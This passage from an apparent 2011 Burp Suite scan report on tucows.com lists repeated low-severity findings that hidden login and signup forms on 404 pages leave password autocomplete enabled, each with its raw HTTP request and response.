The page contains a form with the following action URL:

The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/ajaxlib.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:28 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.21. http://www.tucows.com/images/newassets/includes/js/show_layer.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.22. http://www.tucows.com/images/newassets/includes/js/show_layer.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/show_layer.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/show_layer.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.23. http://www.tucows.com/images/newassets/includes/js/signupin.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.24. http://www.tucows.com/images/newassets/includes/js/signupin.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.25. http://www.tucows.com/images/newassets/includes/js/x_core.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.26. http://www.tucows.com/images/newassets/includes/js/x_core.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.27. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.28. http://www.tucows.com/images/newassets/includes/js/xdocsize.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.29. http://www.tucows.com/images/newassets/includes/js/yetii.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.30. http://www.tucows.com/images/newassets/includes/js/yetii.js

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/yetii.js

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/js/yetii.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:25 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signin" style="visibility: hidden;">
               <form id="signinform" method="POST" action="javascript:void(null);" onsubmit="submitSignin(this);">
                   <div class='bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.31. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL:
The form contains the following password fields with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:25:20 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<div id="signup" style="visibility: hidden;">
               <form id="signupform" name="signupform" method="POST" action="javascript:void(null);" onsubmit="submitSignup(this);">
                   <div class='Clear bgBlue'>
...[SNIP]...
<br />
                           <input type="password" name="pw" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...
<br />
                           <input type="password" name="pwc" size="20" maxlength="20" value="" />
                       </p>
...[SNIP]...

4.32. http://www.tucows.com/images/newassets/includes/themes/03BlueMeany/style.css

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/themes/03BlueMeany/style.css

Issue detail

The page contains a form with the following action URL:
The form contains the following password field with autocomplete enabled:

Request

GET /images/newassets/includes/themes/03BlueMeany/style.css HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
